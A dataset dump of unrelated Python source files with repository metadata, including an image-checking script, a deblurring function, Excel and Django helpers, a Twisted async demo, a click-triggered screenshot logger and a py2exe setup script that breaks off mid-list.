| 2022-04-12T16:16:52.809842 | 2020-03-07T13:26:02 | 2020-03-07T13:26:02 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,541 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Fri Dec 21 14:12:43 2018
A batch verify image tool
After downloading a large amount of image data, usually we find that some
images can not be open, which may be caused by network transmission errors.
Therefore, before using these images, use this tool to verify the image data,
and move the unreadable image to the specified path.
@author: as
"""
import os
import sys
import cv2
import numpy as np
import shutil
import warnings
from PIL import Image
import tensorflow as tf
# raise the warning as an exception
warnings.filterwarnings('error')
from utils.config_utils import load_config_file, mkdir_if_nonexist
flags = tf.app.flags
flags.DEFINE_string('config_path', '', 'path of the config file')
FLAGS = flags.FLAGS
# load config file
config_path = FLAGS.config_path
config_dict = load_config_file(config_path)
sys.stdout.flush()
reshape_size = config_dict['DATASET']['IMAGE_SIZE']
src_dir = config_dict['DATASET']['DATASET_ROOT_DIR']
use_channel_normalization = config_dict['DATASET']['USE_CHANNEL_NORMALIZATION']
output_paras = config_dict['OUTPUT']
experiment_base_dir = os.path.join(output_paras['OUTPUT_SAVE_DIR'], output_paras['EXPERIMENT_NAME'])
model_save_dir = os.path.join(experiment_base_dir, 'weights')
result_save_dir = os.path.join(experiment_base_dir, 'result')
error_save_dir = os.path.join(result_save_dir, 'error_format')
mkdir_if_nonexist(model_save_dir, raise_error=False)
mkdir_if_nonexist(result_save_dir, raise_error=False)
mkdir_if_nonexist(error_save_dir, raise_error=False)
# get datast mean_var file path
mean_var_file = os.path.join(model_save_dir, 'dataset_mean_var.txt')
cnt = 0
rm_cnt = 0
rgb_list = []
for root, dirs, files in os.walk(src_dir):
for file_name in files:
cnt += 1
if cnt % 1000 == 0:
print(cnt)
sys.stdout.flush()
src_file = os.path.join(root, file_name)
dst_file = os.path.join(error_save_dir, file_name)
try:
# check by PIL Image
img_pil = Image.open(src_file)
# check by opencv
img_cv = cv2.imread(src_file)
if type(img_cv) != np.ndarray:
shutil.move(src_file, dst_file)
rm_cnt += 1
print('error when read by cv2!', file_name)
sys.stdout.flush()
continue
# check channel number
shape = img_cv.shape
if len(shape) == 3:
# this image is valid, reshape it
height, width = shape[:2]
if width > height:
height = int(height * reshape_size / width)
width = reshape_size
else:
width = int(width * reshape_size / height)
height = reshape_size
img_reshape = cv2.resize(img_cv, (width, height), interpolation=cv2.INTER_LINEAR)
cv2.imwrite(src_file, img_reshape)
# compute channel mean value
r_mean = np.mean(img_reshape[:,:,2])
g_mean = np.mean(img_reshape[:,:,1])
b_mean = np.mean(img_reshape[:,:,0])
rgb_list.append([r_mean, g_mean, b_mean])
elif len(shape) == 2:
# change channel num to 3
img_bgr = cv2.cvtColor(img_cv, cv2.COLOR_GRAY2BGR)
#img_bgr = cv2.merge((img_cv, img_cv, img_cv))
cv2.imwrite(src_file, img_bgr)
print("change {} from gray to rgb".format(file_name))
sys.stdout.flush()
# compute channel mean value
mean_value = np.mean(img_cv)
rgb_list.append([mean_value, mean_value, mean_value])
else:
shutil.move(src_file, dst_file)
rm_cnt += 1
print('channel number error!', file_name)
sys.stdout.flush()
except Warning:
shutil.move(src_file, dst_file)
rm_cnt += 1
print('A warning raised!', file_name)
sys.stdout.flush()
except:
shutil.move(src_file, dst_file)
#os.remove(src_file)
rm_cnt += 1
print('Error occured!', file_name)
sys.stdout.flush()
if use_channel_normalization == 0:
mean_var_file = os.path.join(model_save_dir, 'dataset_mean_var.txt')
with open(mean_var_file, 'w') as writer:
writer.write("R_mean_std:" + str(128) + ':' + str(128) + '\n')
writer.write("G_mean_std:" + str(128) + ':' + str(128) + '\n')
writer.write("B_mean_std:" + str(128) + ':' + str(128) + '\n')
else:
# compute dataset channel mean and std
rgb_list = np.array(rgb_list)
r_mean = np.mean(rgb_list[:,2])
g_mean = np.mean(rgb_list[:,1])
b_mean = np.mean(rgb_list[:,0])
r_std = np.std(rgb_list[:,2])
g_std = np.std(rgb_list[:,1])
b_std = np.std(rgb_list[:,0])
mean_var_file = os.path.join(model_save_dir, 'dataset_mean_var.txt')
with open(mean_var_file, 'w') as writer:
writer.write("R_mean_std:" + str(r_mean) + ':' + str(r_std) + '\n')
writer.write("G_mean_std:" + str(g_mean) + ':' + str(g_std) + '\n')
writer.write("B_mean_std:" + str(b_mean) + ':' + str(b_std) + '\n')
print('finish')
print("error number {}".format(rm_cnt))
|
[
"[email protected]"
] | |
0f30f9125763d9b2ac1d7dec0a5bd1a1859b038b
|
01341e6b4e13679f3a78bd02f7156cb52d11d8d8
|
/utils_fourier.py
|
6f311983041114e5ad36b3ca37ad29ee24dfbbf4
|
[
"MIT"
] |
permissive
|
majedelhelou/PriorLearning
|
864b1499ac993b730b90e3b700b3d59795865818
|
f66d25993c3b99dd31d9d62abeb3e0a5623e034d
|
refs/heads/master
| 2020-09-13T09:22:45.011770 | 2020-01-11T23:50:10 | 2020-01-11T23:50:10 | 222,724,499 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,159 |
py
|
from utils_deblur import psf2otf, otf2psf
import numpy as np
def deblurring_estimate(Y, X_l, k_l, reg_weight=1):
'''
Operation: solve for Z that minimizes: ||Y-k_l*Z||**2 + reg_weight * ||Z-X_l||**2
Inputs:
2D images Y and X_l (Gray or multichannel)
k_l (blur kernel for the low-res image, should be normalized to 1)
reg_weight (weight of the reg term ||Z-X_l||**2)
Outputs:
Z image that minimizes the optimization loss
'''
# Convert inputs to Fourier domain
X_l_Freq = np.fft.fft2(X_l, axes=[0, 1])
Y_Freq = np.fft.fft2(Y, axes=[0, 1])
k_l_Freq = psf2otf(k_l, Y.shape[:2])
if X_l_Freq.ndim == 3:
k_l_Freq = np.repeat(k_l_Freq[:, :, np.newaxis], X_l_Freq.shape[2], axis=2)
# Solve for k in Fourier domain (regularization only affects den)
num = k_l_Freq.conjugate() * Y_Freq + reg_weight * X_l_Freq
den = np.abs(k_l_Freq)**2 + reg_weight # Fourier transform of k_l transpose * k_l + reg_weight
Z_Freq = num / den
# Convert back to spatial, given the width
Z = np.real(np.fft.ifft2(Z_Freq, axes=(0, 1)))
return Z
|
[
"[email protected]"
] | |
7416cbc73d6ba31ae6410ac8ec422a06a219270e
|
4ca5ad12b083ed7dd8d5132bc9e66d4dea326dda
|
/WebClass/web_11_自动化测试框架V1/common/handle_excel.py
|
a06471baff2cf97acf86513f147a3ab66d7e499b
|
[] |
no_license
|
ybsgithup/Code
|
7b279f68d96908f2ae44d21e3da335110bc308e4
|
bbc2018e6a7ce7293c5effb409d7a6279033ae15
|
refs/heads/master
| 2022-11-23T23:02:48.908126 | 2020-07-27T04:24:38 | 2020-07-27T04:24:38 | 276,266,634 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,465 |
py
|
import os
from openpyxl import load_workbook
class Testcase:
pass
class HandleExcel:
def __init__(self, filename, sheetname=None):
self.filename = filename
self.sheetname = sheetname
def read_data(self):
"""
读数据
:return:
"""
wb = load_workbook(self.filename)
if self.sheetname is None:
ws = wb.active
else:
ws = wb[self.sheetname]
testcases_list = []
headers_list = [] # 存放表头信息
for row in range(1, ws.max_row + 1):
# 存放每一行的用例数据
# one_row_dict = {}
one_testcase = Testcase() # 创建用例对象
for column in range(1, ws.max_column + 1):
one_cell_value = ws.cell(row, column).value
if row == 1:
# headers_list.append(one_cell_value)
# 将获取的表头,转化为字符串并添加至headers_list中
headers_list.append(str(one_cell_value))
else:
# 获取表头字符串数据
key = headers_list[column - 1]
# one_row_dict[key] = one_cell_value
if key == "actual":
# 设置存放实际响应报文所在列的列号actual_column属性
setattr(one_testcase, "actual_column", column)
elif key == "result":
# 设置存放用例执行结果所在列的列号result_column属性
setattr(one_testcase, "result_column", column)
setattr(one_testcase, key, one_cell_value)
if row != 1:
# testcases_list.append(one_row_dict)
# 设置当前用例所在的行号row属性
setattr(one_testcase, "row", row)
testcases_list.append(one_testcase)
return testcases_list
'''
def write_data(self, row, column, data):
"""
写操作
:param row: 指定在某一行写
:param column: 指定在某一列写
:param data: 待写入的数据
:return:
"""
# 将数据写入到excel中,不能与读取操作公用一个Workbook对象
# 如果使用同一个Workbook对象,只能将最后一次写入成功,会出现意想不到的结果
wb = load_workbook(self.filename)
if self.sheetname is None:
ws = wb.active
else:
ws = wb[self.sheetname]
# 第一种写入方式:
# one_cell = ws.cell(row, column)
# one_cell.value = data
# 第二种写入方式:
ws.cell(row, column, value=data)
wb.save(self.filename)
'''
def write_data(self, one_testcase, actual_value, result_value):
wb = load_workbook(self.filename)
if self.sheetname is None:
ws = wb.active
else:
ws = wb[self.sheetname]
# 第二种写入方式:
ws.cell(one_testcase.row, one_testcase.actual_column, value=actual_value)
ws.cell(one_testcase.row, one_testcase.result_column, value=result_value)
wb.save(self.filename)
if __name__ == '__main__':
excel_filename = "../data/test_case.xlsx"
sheet_name = "cases_error"
do_excel = HandleExcel(excel_filename, sheet_name)
do_excel.read_data()
pass
|
[
"[email protected]"
] | |
9ff12a83fa349c141961c33c8bda172be333ee74
|
89108805110edac6d07de41130a9bc45d62efb9d
|
/mailinglist_registration/backends/messages/views.py
|
7e5ac56aa132db7d8dfe58368d69d8731b85b4c5
|
[
"BSD-3-Clause"
] |
permissive
|
danielpatrickdotdev/django-mailinglist-registration
|
7824aaa6232ebfe5de5e3dc65a19cc707b6b4686
|
756c4ac2052063249b66eaa4c153694a5fb3eba1
|
refs/heads/master
| 2021-05-27T17:56:54.917761 | 2013-07-13T12:29:01 | 2013-07-13T12:29:01 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,919 |
py
|
from django.conf import settings
from django.shortcuts import redirect
from django.contrib.sites.models import RequestSite, Site
from django.contrib import messages
from django.views.generic.base import TemplateView
from mailinglist_registration import signals
from mailinglist_registration.models import RegistrationProfile, Subscriber
from mailinglist_registration.views import ActivationView as BaseActivationView
from mailinglist_registration.views import RegistrationView as BaseRegistrationView
class RegistrationView(BaseRegistrationView):
def register(self, request, **cleaned_data):
"""
Given an email address, register a new subscriber, which will
initially be inactive.
Along with the new ``Subscriber`` object, a new
``mailinglist_registration.models.RegistrationProfile`` will be created,
tied to that ``Subscriber``, containing the activation key which
will be used for this account.
An email will be sent to the supplied email address; this
email should contain an activation link. The email will be
rendered using two templates. See the documentation for
``RegistrationProfile.send_activation_email()`` for
information about these templates and the contexts provided to
them.
After the ``Subscriber`` and ``RegistrationProfile`` are created and
the activation email is sent, the signal
``mailinglist_registration.signals.subscriber_registered`` will
be sent, with the new ``Subscriber`` as the keyword argument
``subscriber`` and the class of this backend as the sender.
"""
email = cleaned_data['email']
if Site._meta.installed:
site = Site.objects.get_current()
else:
site = RequestSite(request)
subscriber = RegistrationProfile.objects.create_inactive_subscriber(email, site)
signals.subscriber_registered.send(sender=self.__class__,
subscriber=subscriber,
request=request)
return subscriber
def registration_allowed(self, request):
"""
In order to keep this backend simple, registration is always open.
"""
return True
def form_valid(self, request, form):
new_subscriber = self.register(request, **form.cleaned_data)
success_url = self.get_success_url(request, new_subscriber)
messages.info(self.request,"Thanks for signing up to our updates! Please check your emails to confirm your email address.")
# success_url may be a simple string, or a tuple providing the
# full argument set for redirect(). Attempting to unpack it
# tells us which one it is.
try:
to, args, kwargs = success_url
return redirect(to, *args, **kwargs)
except ValueError:
return redirect(success_url)
class ActivationView(TemplateView):
"""
Base class for subscriber activation views.
"""
success_url = None
http_method_names = ['get']
def get(self, request, *args, **kwargs):
activated_subscriber = self.activate(request, *args, **kwargs)
if activated_subscriber:
messages.success(request,"Your email address has been confirmed. Thank you for subscribing to our updates!")
success_url = self.get_success_url(request, activated_subscriber)
try:
to, args, kwargs = success_url
return redirect(to, *args, **kwargs)
except ValueError:
return redirect(success_url)
else:
messages.error(request,"Hmm. Something went wrong somewhere. Maybe the activation link expired?")
success_url = self.get_success_url(request, activated_subscriber)
return redirect(success_url)
def activate(self, request, activation_key):
"""
Given an an activation key, look up and activate the subscriber
account corresponding to that key (if possible).
After successful activation, the signal
``mailinglist_registration.signals.subscriber_activated`` will be sent, with the
newly activated ``Subscriber`` as the keyword argument ``subscriber`` and
the class of this backend as the sender.
"""
activated_subscriber = RegistrationProfile.objects.activate_subscriber(activation_key)
if activated_subscriber:
signals.subscriber_activated.send(sender=self.__class__,
subscriber=activated_subscriber,
request=request)
return activated_subscriber
def get_success_url(self, request, subscriber):
return self.success_url
class DeRegistrationView(TemplateView):
success_url = None
def get(self, request, deactivation_key, *args, **kwargs):
"""
Given an a deactivation key, look up and deactivate the subscriber
account corresponding to that key (if possible).
After successful deactivation, the signal
``mailinglist_registration.signals.subscriber_deactivated`` will be sent, with the
email of the deactivated ``Subscriber`` as the keyword argument ``email`` and
the class of this backend as the sender.
"""
email = Subscriber.objects.deactivate_subscriber(deactivation_key)
if email:
signals.subscriber_deactivated.send(sender=self.__class__,
email=email,
request=request)
messages.info(request,"Your email address has been removed from our mailing list.")
else:
messages.error(request,"Are you sure you typed that URL correctly?")
return redirect(self.success_url)
|
[
"[email protected]"
] | |
77842a6aee9b5ded6310e374e78ec44dfddb45bd
|
d2cb930ed5df0b1b5f7944e00f6f884bf014803d
|
/douban/twisted-demo.py
|
fcf677fc5cecf53c84cde258c7d3baea35271f91
|
[] |
no_license
|
sixDegree/python-scrapy-demo
|
3cae4298b01edab65449cfe9af56b2fa59f4c07d
|
b66530e54156be8c7877f1fc4d497fd497b6fdda
|
refs/heads/master
| 2020-06-17T03:16:23.038061 | 2019-07-08T09:25:15 | 2019-07-08T09:25:15 | 195,777,787 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,184 |
py
|
from twisted.internet import reactor # 事件循环(自动终止条件:所有socket都已移除)
from twisted.internet import defer # defer.Deferred 特殊的socket对象(需手动调用执行,手动移除)
from twisted.internet import task
import treq # 用于发送异步Request,返回Deferred对象
import time
# 延迟机制:
# Deferred 延迟对象,代表的是一个无法立即获取的值
def demo_defer1():
d = defer.Deferred()
print("called:", d.called) # False
print("call...")
d.callback("Hello")
print("called:", d.called) # True
print("result:", d.result) # Hello
def demo_defer2():
def done(v):
print("done called")
return "Hello " + v
d = defer.Deferred()
d.addCallback(done)
print("called:", d.called) # False
print("call...")
d.callback("Tom")
print("called:", d.called) # True
print("result:", d.result) # Hello Tom
def demo_defer3():
def status(*ds):
return [(getattr(d, 'result', 'N/A'), len(d.callbacks)) for d in ds]
def b_callback(arg):
print("b_callback called with arg =", arg)
return b
def on_done(arg):
print("on_done called with arg =", arg)
return arg
a = defer.Deferred()
b = defer.Deferred()
a.addCallback(b_callback).addCallback(on_done)
print(status(a, b)) # [('N/A', 2), ('N/A', 0)]
a.callback(3) # b_callback called with arg = 3
print(status(a, b)) # [(<Deferred at 0x1047a0da0>, 1), ('N/A', 1)]
b.callback(4) # on_done called with arg = 4
print(status(a, b)) # [(4, 0), (None, 0)]
def demo_defer4():
def status(*ds):
return [(getattr(d, 'result', 'N/A'), len(d.callbacks)) for d in ds]
def b_callback(arg):
print("b_callback called with arg =", arg)
return b
def on_done(arg):
print("on_done called with arg =", arg)
return arg
a = defer.Deferred()
b = defer.Deferred()
a.addCallback(b_callback).addCallback(on_done)
print(status(a, b)) # [('N/A', 2), ('N/A', 0)]
b.callback(4)
print(status(a, b)) # [('N/A', 2), (4, 0)]
a.callback(3) # b_callback called with arg = 3
# on_done called with arg = 4
print(status(a, b)) # [(4, 0), (None, 0)]
def demo_defer5():
def on_done(arg):
print("on_done called with arg =", arg)
return arg
dfds = [defer.Deferred() for i in range(5)]
defer.DeferredList(dfds).addCallback(on_done)
for i in range(5):
dfds[i].callback(i)
# on_done called with arg = [(True, 0), (True, 1), (True, 2), (True, 3), (True, 4)]
# on_done 要等到列表中所有延迟都触发(调用`callback(...)`)后调用
def demo_reactor1():
def done(arg):
print("Done", arg)
def defer_task():
print("Start")
d = defer.Deferred()
time.sleep(3)
d.callback("123")
return d
def stop():
reactor.stop()
defer_task().addCallback(done)
reactor.callLater(0, stop)
reactor.run()
def demo_reactor2():
def done(arg):
print("Done", arg)
def all_done(arg):
print("All done", arg)
def defer_task(i):
print("Start", i)
d = defer.Deferred()
d.addCallback(done)
time.sleep(2)
d.callback(i)
return d
def stop():
print("Stop reactor")
reactor.stop()
dfds = defer.DeferredList([defer_task(i) for i in range(5)])
dfds.addCallback(all_done)
reactor.callLater(0, stop)
reactor.run()
def demo_reactor3():
def done(arg):
print("Done", arg)
def all_done(arg):
print("All done", arg)
print("Stop reactor")
reactor.stop()
def defer_task(i):
print("Start", i)
return task.deferLater(reactor, 2, done, i)
dfds = defer.DeferredList([defer_task(i) for i in range(5)])
dfds.addBoth(all_done)
# dfds.addCallback(all_done)
# reactor.callLater(5, stop)
reactor.run()
def demo_treq_get(url):
def get_done(response):
print("get response:", response)
reactor.stop()
treq.get(url).addCallback(get_done)
reactor.run()
def main():
@defer.inlineCallbacks
def my_task1():
print("Start task1")
url = "http://www.baidu.com"
d = treq.get(url.encode('utf-8'))
d.addCallback(parse)
yield d
def my_task2():
print("Start task2")
return task.deferLater(reactor, 2, parse, "200")
@defer.inlineCallbacks # need use `yield`
def my_task3():
print("Start task3")
yield task.deferLater(reactor, 2, parse, "400")
def parse(response):
print("parse response:", response)
def all_done(arg):
print("All done", arg)
reactor.stop()
dfds = defer.DeferredList([my_task1(), my_task2(), my_task3(), ])
dfds.addBoth(all_done)
reactor.run()
if __name__ == "__main__":
# demo_defer1()
# demo_defer2()
# demo_defer3()
# demo_defer4()
# demo_defer5()
# demo_reactor1()
# demo_reactor2()
# demo_reactor3()
# demo_treq_get('http://www.baidu.com')
main()
|
[
"[email protected]"
] | |
f6a223d328e72ba600c445072360b528c214a1e7
|
35ef5e728116fc66d0b75656be2f26786348b14a
|
/accounts/migrations/0006_contact_create_date.py
|
06dcda1b829ebc66c72d66a79ac32633ba63d638
|
[] |
no_license
|
ahmedyasin21/believer
|
e16d1c2c36cca12291d57d923cc39b5458ec1a5a
|
4ce02c0f7f090ea02222c6a7396be2a9fd741295
|
refs/heads/main
| 2023-08-20T04:43:39.976198 | 2021-11-01T07:50:39 | 2021-11-01T07:50:39 | 423,379,714 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 444 |
py
|
# Generated by Django 3.0.3 on 2020-10-01 10:35
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('accounts', '0005_auto_20201001_0148'),
]
operations = [
migrations.AddField(
model_name='contact',
name='create_date',
field=models.DateTimeField(default=django.utils.timezone.now),
),
]
|
[
"[email protected]"
] | |
ad04ab061a5956176bed1dea790659a21862a6d9
|
81e40b229182662606ba521c60386790b4163d10
|
/shopping-elf/data-microservice/processed_data_service.py
|
78852c22d17b3dce1c926f04b902b31d5a77178a
|
[] |
no_license
|
neilthaker07/Shopping-Elf
|
64e1dc23b012cac4969bfded1c569b1a2e4818df
|
dd214503b240dc4092d1c7d2244bca1a37a1f357
|
refs/heads/master
| 2020-05-31T21:35:11.600984 | 2017-05-21T17:41:21 | 2017-05-21T17:41:21 | 94,049,664 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,867 |
py
|
import mysql.connector
from Models import ShoppingItems
from Models import ShoppingList
import collections
import DbConstants
def getShoppingList(userid):
db = mysql.connector.connect(user=DbConstants.USER, passwd=DbConstants.PASSWORD, host=DbConstants.HOST,
database=DbConstants.DATABASE)
cur = db.cursor()
query = "SELECT product_name,DATE_FORMAT(invoice_date,'%%m-%%d-%%Y'),days,quantity,ABS(DATEDIFF(NOW(),DATE_ADD(invoice_date,INTERVAL days DAY))) as last FROM `inventory` WHERE user_id ='%s' and (DATE_ADD(invoice_date,INTERVAL days DAY) < DATE_ADD(NOW(),INTERVAL 2 DAY) or DATE_ADD(invoice_date,INTERVAL days DAY) > DATE_ADD(NOW(),INTERVAL -2 DAY)) and ABS(DATEDIFF(NOW(),DATE_ADD(invoice_date,INTERVAL days DAY)))<7";
cur.execute(query %(userid))
rows=cur.fetchall()
shoppingList =[]
for each_row in rows:
shoppingList.append(ShoppingItems(each_row[0],each_row[1],each_row[2],each_row[3],each_row[4]));
cur.close()
db.close()
return formatShoppingData(shoppingList);
def getShoppingListProducts(userid):
db = mysql.connector.connect(user=DbConstants.USER, passwd=DbConstants.PASSWORD, host=DbConstants.HOST,
database=DbConstants.DATABASE)
cur = db.cursor()
query = "SELECT product_name FROM `inventory` WHERE user_id ='%s' and (DATE_ADD(invoice_date,INTERVAL days DAY) < DATE_ADD(NOW(),INTERVAL 2 DAY) or DATE_ADD(invoice_date,INTERVAL days DAY) > DATE_ADD(NOW(),INTERVAL -2 DAY)) and ABS(DATEDIFF(NOW(),DATE_ADD(invoice_date,INTERVAL days DAY)))<7";
cur.execute(query %(userid))
rows=cur.fetchall()
shoppingList =[]
for each_row in rows:
shoppingList.append(each_row[0]);
cur.close()
db.close()
return shoppingList;
def getProductConsumption(userid,product_name):
db = mysql.connector.connect(user=DbConstants.USER, passwd=DbConstants.PASSWORD, host=DbConstants.HOST,
database=DbConstants.DATABASE)
cur = db.cursor()
query = "SELECT DATE_FORMAT(invoice_date,'%%m-%%d-%%Y'),bill_date, qty FROM shopping_elf.receipt_data where product_name='%s' and userid= '%s'"
cur.execute(query %(userid,product_name) )
rows=cur.fetchall()
sList = [];
for each_row in rows:
d = collections.OrderedDict()
d['date'] = each_row[0];
d['quantity'] = each_row[1];
sList.append(d)
cur.close()
db.close()
return sList;
def getNotificationData():
db = mysql.connector.connect(user=DbConstants.USER, passwd=DbConstants.PASSWORD, host=DbConstants.HOST,
database=DbConstants.DATABASE)
cur = db.cursor()
query = "select i.user_id,u.user_api_key, i.product_name from shopping_elf.inventory i , shopping_elf.`user` u where DATEDIFF(NOW(),invoice_date) +1 = days and u.username=i.user_id order by user_id"
cur.execute(query)
rows=cur.fetchall()
notificationsList=collections.OrderedDict()
for each_row in rows:
if(each_row[1] in notificationsList):
productList = notificationsList[each_row[1]]
productList.append(each_row[2])
else:
productList=[]
productList.append(each_row[2])
notificationsList[each_row[1]] =productList
cur.close()
db.close()
return notificationsList;
def formatShoppingData(shoppingList):
sList =[];
for eachData in shoppingList:
d = collections.OrderedDict()
d['productName'] = eachData.productName; # its agent id
d['lastBilldate'] = eachData.billDate;
d['estimate_days'] = eachData.estimate_days;
d['quantity'] = eachData.quantity;
d['estimated_days_to_last'] = eachData.estimated_days_to_last;
sList.append(d)
return sList;
|
[
"[email protected]"
] | |
e0cca89f4a4f404016bb78405ab89923c78dd493
|
9efe0d0773bddc264b9598bf1cb16f821dd0ed9c
|
/detect.py
|
f2ec8cc08dde54b5e1bd55dcab9e3f4285d4d5dc
|
[
"MIT"
] |
permissive
|
chaosparrot/icuclick
|
08ecacda1ca663a653ec8d9b3233ad8dc264262a
|
2ca7f3446bcddbd03aa3211a544427c826809444
|
refs/heads/master
| 2020-07-06T04:08:16.090683 | 2019-08-25T09:10:39 | 2019-08-25T09:10:39 | 202,886,525 | 2 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,656 |
py
|
# Code to check if left or right mouse buttons were pressed
import win32api
import time
import pyautogui
import numpy
from win32gui import WindowFromPoint, GetWindowRect
pyautogui.PAUSE = 0
pyautogui.FAILSAVE = False
state_left = win32api.GetKeyState(0x01) # Left button down = 0 or 1. Button up = -127 or -128
state_right = win32api.GetKeyState(0x02) # Right button down = 0 or 1. Button up = -127 or -128
large_movement_picture = None
movement_start_time = None
previous_position = pyautogui.position()
window_bounds = GetWindowRect( WindowFromPoint( (0, 0) ) )
window_bounds_text = '[' + ','.join(str(x) for x in window_bounds) + ']'
while True:
a = win32api.GetKeyState(0x01)
b = win32api.GetKeyState(0x02)
position = pyautogui.position()
if a != state_left: # Button state changed
state_left = a
pic = pyautogui.screenshot()
if a < 0:
# Keep the window bounds only when holding down the mouse button, because the windows size can change based on releasing the mouse button
window_bounds = GetWindowRect( WindowFromPoint( position ) )
window_bounds_text = '[' + ','.join(str(x) for x in window_bounds) + ']'
pic.save('data/raw/' + str( int( time.time() * 100 ) ) + '--(' + str(position[0]) + '-' + str(position[1]) + ')--' + window_bounds_text + '--mousedown.png')
print('Saving mousedown screenshot')
else:
pic.save('data/raw/' + str( int( time.time() * 100 ) ) + '--(' + str(position[0]) + '-' + str(position[1]) + ')--' + window_bounds_text + '--mouseup.png')
print( "Saving mouseup screenshot" )
if large_movement_picture is not None:
large_movement_picture.save('data/raw/' + str( int( movement_start_time * 100 ) ) + '--(' + str(position[0]) + '-' + str(position[1]) + ')--' + window_bounds_text + '--mousemove.png')
print( "Saving mousemovement screenshot" )
large_movement_picture = None
movement_start_time = None
if b != state_right: # Button state changed
state_right = b
#print(b)
#if b < 0:
#print('Right Button Pressed')
#else:
#print('Right Button Released')
# Large movement detection
xDistance = numpy.linalg.norm(previous_position[0]-position[0])
yDistance = numpy.linalg.norm(previous_position[1]-position[1])
if( xDistance + yDistance > 10 ):
large_movement_picture = pyautogui.screenshot()
movement_start_time = time.time()
print( "Detecting large movement - " + str( xDistance + yDistance ) )
previous_position = position
|
[
"[email protected]"
] | |
54a101a64b5ebe750e17ac1ffc6585ee11bd2c36
|
c84aa32e9961773a830e2ed97ed598d405732ee6
|
/translator.py
|
10b9bb7cfdfc50ec19dc9ed1ee9dd9aea8015fe8
|
[
"MIT"
] |
permissive
|
imfulee/ChineseDetector
|
db6130f95552b47f9a637e6f9f69c007fc9cb26d
|
ee85c8a372c850206a2da7ce5eb7882ef3d5f408
|
refs/heads/main
| 2023-03-06T13:03:21.743274 | 2021-02-13T16:47:58 | 2021-02-13T16:47:58 | 326,115,304 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 142 |
py
|
from opencc import OpenCC
'''pip install opencc-python-reimplemented'''
simplified_to_traditional = lambda text : OpenCC('s2t').convert(text)
|
[
"[email protected]"
] | |
10329cd8754e9c98706dbaac2a3fdf61e41158c0
|
000144b20bfd717d223c088847de9479ca23c499
|
/djangorq_project/wsgi.py
|
d1fa13347e41771775c75bc8cc6769d7b61d572b
|
[] |
no_license
|
stuartmaxwell/django-django_rq-advanced-example
|
cfbb8ea83d28354def6fa4787a18718507a422db
|
f9c88b4fa5c4377143fb9986888c11adf95c57ef
|
refs/heads/master
| 2022-12-03T15:00:47.284986 | 2020-08-03T09:38:50 | 2020-08-03T09:38:50 | 260,836,030 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 409 |
py
|
"""
WSGI config for djangorq_project project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "djangorq_project.settings")
application = get_wsgi_application()
|
[
"[email protected]"
] | |
1b9d741b46cbdeed5b3a3bac485cf1c895171822
|
1d38c549c07f43cc26b7353ef95300b934eeed33
|
/setup.py
|
9475e9b22ed79c0c28f6d00f6eec5f19bf0269e4
|
[] |
no_license
|
pooyagheyami/Adel3
|
a6354fbc5aa56a9c38a8b724c8d22bea689380a1
|
29e257e19fd6914de0e60c303871321e457a858b
|
refs/heads/master
| 2022-11-07T21:53:13.958369 | 2020-06-12T13:22:55 | 2020-06-12T13:22:55 | 271,803,177 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 9,530 |
py
|
# ======================================================== #
# File automagically generated by GUI2Exe version 0.5.3
# Copyright: (c) 2007-2012 Andrea Gavana
# ======================================================== #
# Let's start with some default (for me) imports...
from distutils.core import setup
from py2exe.build_exe import py2exe
import glob
import os
import zlib
import shutil
# Remove the build folder
shutil.rmtree("build", ignore_errors=True)
class Target(object):
""" A simple class that holds information on our executable file. """
def __init__(self, **kw):
""" Default class constructor. Update as you need. """
self.__dict__.update(kw)
# Ok, let's explain why I am doing that.
# Often, data_files, excludes and dll_excludes (but also resources)
# can be very long list of things, and this will clutter too much
# the setup call at the end of this file. So, I put all the big lists
# here and I wrap them using the textwrap module.
data_files = [('GUI\AuiPanel', ['F:\\Adel2\\GUI\\AuiPanel\\__init__.pyc',
'F:\\Adel2\\GUI\\AuiPanel\\Rev.pyc',
'F:\\Adel2\\GUI\\AuiPanel\\Stat.pyc']),
('GUI\Edit', ['F:\\Adel2\\GUI\\Edit\\__init__.pyc',
'F:\\Adel2\\GUI\\Edit\\accsrh.pyc',
'F:\\Adel2\\GUI\\Edit\\buyit.pyc',
'F:\\Adel2\\GUI\\Edit\\EDA.pyc',
'F:\\Adel2\\GUI\\Edit\\Edacc.pyc',
'F:\\Adel2\\GUI\\Edit\\EDM.pyc',
'F:\\Adel2\\GUI\\Edit\\Edmolk6.pyc',
'F:\\Adel2\\GUI\\Edit\\Edmolk62.pyc',
'F:\\Adel2\\GUI\\Edit\\InAcc3.pyc',
'F:\\Adel2\\GUI\\Edit\\Pnl0.pyc',
'F:\\Adel2\\GUI\\Edit\\Specy.pyc']),
('Database', ['F:\\Adel2\\Database\\__init__.pyc',
'F:\\Adel2\\Database\\ABR.db',
'F:\\Adel2\\Database\\Company.db',
'F:\\Adel2\\Database\\DataGet.pyc',
'F:\\Adel2\\Database\\Main.db',
'F:\\Adel2\\Database\\MDataGet.pyc',
'F:\\Adel2\\Database\\Menu.db',
'F:\\Adel2\\Database\\MenuSet.pyc',
'F:\\Adel2\\Database\\Molk.db',
'F:\\Adel2\\Database\\wxsq2.pyc']),
('GUI', ['F:\\Adel2\\GUI\\__init__.pyc',
'F:\\Adel2\\GUI\\BG.pyc',
'F:\\Adel2\\GUI\\MainMenu.pyc',
'F:\\Adel2\\GUI\\proman.pyc',
'F:\\Adel2\\GUI\\window.pyc']),
('GUI\Input', ['F:\\Adel2\\GUI\\Input\\__init__.pyc',
